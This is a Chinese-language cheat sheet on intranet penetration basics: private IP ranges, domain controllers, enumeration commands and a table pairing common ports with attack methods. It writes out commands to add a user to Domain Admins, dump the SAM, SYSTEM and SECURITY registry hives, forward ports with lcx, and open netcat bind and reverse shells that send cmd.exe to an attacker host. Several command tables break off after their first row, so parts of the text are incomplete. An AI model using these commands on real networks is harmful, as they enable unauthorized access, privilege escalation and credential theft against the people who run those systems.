内网渗透基础知识
0x01
了解一下内网的ip分配
内网常用的三种ip:
A类 10.0.0.0–10.255.255.255
B类 172.16.0.0–172.31.255.255
C类 192.168.0.0–192.168.255.255
域控制器
域控制器是指在“
域
”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为域控制器(Domain Controller,简写为DC)在域中拥有最高权限,它能对域中的所有计算机进行操作和管理。
0x02
内网中常用的系统命令
1 | tracert IP //路由跟踪 |
windows操作命令
1 | net group /domain //获得所有域用户组列表 |
普通域用户提升为域管理员:
net group "Domain Admins" xxx /add /domain
敏感数据和目录
1 | dir /b/s config.* //查看所在目录所有config.为前缀的文件 |
0x03
基本内网渗透命令
1 | ipconfig /all //查看ip地址 |
导出注册表的命令
1 | reg save hklm\sam sam.hive & reg save hklm\system system.hive & reg save hklm\security security.hive |
0x04
内网测试中代理与端口转发
正向代理
Lhost ——> proxy ——> Rhost
反向代理
Lhost <——> proxy <——> firewall <——> Rhost
windows lcx端口转发
lcx常用命令
1 | 1: -listen <ConnectPort1> <TransmitPort2> |
内网上执行:lcx.exe –slave 192.168.100.101 8888 192.168.100.111 3389
NC反弹CMDshell(netcat)
靶机上输入:
nc.exe -l -p 8888 -e cmd.exe
将cmd.exe转发到8888端口
攻击机输入:
nc.exe -nvv 192.168.100.101 8888
连接到靶机的8888端口(获取cmd.exe的执行权限)
反向连接:
攻击机输入:
nc.exe -l -p 8888
监听本地8888端口
靶机上输入:
nc.exe -e cmd.exe 192.168.100.100 8888
将靶机的cmd.exe转发到攻击机的8888端口
0x05
端口与服务
端口号 | 端口说明 | 攻击技巧 |
---|---|---|
21/22/69 | ftp/tftp:文件传输协议 | 爆破\嗅探\溢出\后门 |
22 | ssh:远程连接 | 爆破OpenSSH;28个退格 |
23 | telnet:远程连接 | 爆破\嗅探 |
25 | smtp:邮件服务 | 邮件伪造 |
53 | DNS:域名系统 | DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙 |
67/68 | dhcp | 劫持\欺骗 |
110 | pop3 | 爆破 |
139 | samba | 爆破\未授权访问\远程代码执行 |
143 | imap | 爆破 |
161 | snmp | 爆破 |
389 | ldap | 注入攻击\未授权访问 |
512/513/514 | linux r | 直接使用rlogin |
873 | rsync | 未授权访问 |
1080 | socket | 爆破:进行内网渗透 |
1352 | lotus | 爆破:弱口令\信息泄漏:源代码 |
1433 | mssql | 爆破:使用系统用户登录\注入攻击 |
1521 | oracle | 爆破:TNS\注入攻击 |
2049 | nfs | 配置不当 |
2181 | zookeeper | 未授权访问 |
3306 | mysql | 爆破\拒绝服务\注入 |
3389 | rdp | 爆破\Shift后门\0708 |
4848 | glassfish | 爆破:控制台弱口令\认证绕过 |
5000 | sybase/DB2 | 爆破\注入 |
5432 | postgresql | 缓冲区溢出\注入攻击\爆破:弱口令 |
5632 | pcanywhere | 拒绝服务\代码执行 |
5900 | vnc | 爆破:弱口令\认证绕过 |
6379 | redis | 未授权访问\爆破:弱口令 |
7001 | weblogic | Java反序列化\控制台弱口令\控制台部署webshell |
80/443/8080 | web | 常见web攻击\控制台爆破\对应服务器版本漏洞 |
8069 | zabbix | 远程命令执行 |
9090 | websphere控制台 | 爆破:控制台弱口令\Java反序列 |
9200/9300 | elasticsearch | 远程代码执行 |
11211 | memcacache | 未授权访问 |
27017 | mongodb | 爆破\未授权访问 |